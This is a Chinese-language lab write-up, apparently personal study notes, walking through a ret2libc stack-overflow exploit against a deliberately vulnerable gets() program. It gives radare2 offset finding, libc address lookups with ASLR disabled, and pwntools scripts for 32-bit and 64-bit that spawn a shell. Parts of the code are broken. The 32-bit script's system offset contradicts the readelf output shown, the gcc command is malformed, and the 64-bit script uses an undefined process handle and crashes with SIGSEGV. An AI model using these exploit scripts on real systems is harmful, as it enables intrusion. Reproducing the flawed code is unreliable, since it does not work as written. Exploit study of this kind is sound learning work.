ret2libc

程序开启nx保护时候,传统的shellcode在栈上不可执行,无法获取 执行shell程序,可以用ret2libc技术。

漏洞程序

#include <stdio.h>

void vuln() {
    char buffer[64];

    puts("Overflow me");
    gets(buffer);
}

int main() {
    vuln();
}    

gcc vuln.c -o -m32 -fno-stack-protector -no-pie vuln-32

└─$ checksec --file=./vuln-32
[*] '/home/kali/exploits/ret2libc/vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

利用方案

eip直接指向system(’/bin/sh')

确定eip的偏移

[0xf7fe4450]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
[+] SIGNAL 11 errno=0 addr=0x41614141 code=1 si_pid=1096892737 ret=0
[0x41614141]> wopO 0x41614141
76

eip_offset == 76

获取system函数地址

(注意此时是关闭ASLR情况下)

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-32
        linux-gate.so.1 (0xf7fc7000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)
        /lib/ld-linux.so.2 (0xf7fc9000)

──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/i386-linux-gnu/libc.so.6| grep system 
  3172: 0004c800    55 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0

system_addr == 0xf7c00000 + 0004c800

获取/bin/sh地址

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -tx /lib/i386-linux-gnu/libc.so.6|grep "/bin/sh"
 1b5faa /bin/sh

binsh_addr == 0xf7c00000 + 1b5faa

pwn code

from pwn import *

context.binary = ELF('./vuln-32')

p = process()

libc_base = 0xf7c00000
system_addr = libc_base +  0x4c7b0
binsh_addr = libc_base + 0x1b5faa

RET_OFFSET = 76
payload = b'A' * RET_OFFSET
payload += p32(system_addr) # retrun to system == pop eip
payload += p32(0)           # [esp] == system's return address,now it's not importance 
payload += p32(binsh_addr)  #  [esp + 4] == system's 1st parameters

p.clean()
p.sendline(payload)
p.interactive()

64位利用方案

x64模式下,参数传递是通过寄存器rdi,rsi,rdx,rcx,r8,r9,所以要使system(‘/bin/sh’)执行,需要{pop rdi ,ret} gadget

获取libc基地址

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-64
	linux-vdso.so.1 (0x00007ffff7fc9000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dce000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcb000)

获取system偏移地址

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/x86_64-linux-gnu/libc.so.6| grep system
  1023: 000000000004c330    45 FUNC    WEAK   DEFAULT   16 system@@GLIBC_2.2.5

获取/bin/sh偏移地址

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 |grep /bin/sh
 196031 /bin/sh

获取rop gadget

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ROPgadget --binary vuln-64 |grep rdi
0x0000000000401042 : fisubr dword ptr [rdi] ; add byte ptr [rax], al ; push 1 ; jmp 0x401020
0x00000000004010a6 : or dword ptr [rdi + 0x404038], edi ; jmp rax
0x00000000004011cb : pop rdi ; ret

定位rip偏移

[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
[0x00401159]> dr
rsi = 0x00000001
rdi = 0x7ffff7fa1a20
rsp = 0x7fffffffe308
rbp = 0x4141584141574141
rip = 0x00401159
rflags = 0x00010202
orax = 0xffffffffffffffff
[0x00401159]> wopO `dr rbp`
64

rip_offset = rbp_offset + 8 = 72

64bits pwn

from pwn import *
context.binary = ELF('./vuln-64')
libc = 0x00007ffff7dce000
system_offset = 0x4c330
binsh_offset = 0x196031
system = libc + system_offset
binsh = libc + binsh_offset
rop = 0x4011cb
payload = b'A' * 72
payload += p64(rop)
payload += p64(binsh)
payload += p64(system)
payload += p64(0x0)

p.clean()
p.sendline(payload)
p.interactive()

结果有个bug???

┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ python expvuln64.py    
[*] '/home/kali/exploits/ret2libc/vuln-64'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './vuln-64': pid 1953037
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ ls
[*] Process './vuln-64' stopped with exit code -11 (SIGSEGV) (pid 1953037)
[*] Got EOF while sending in interactive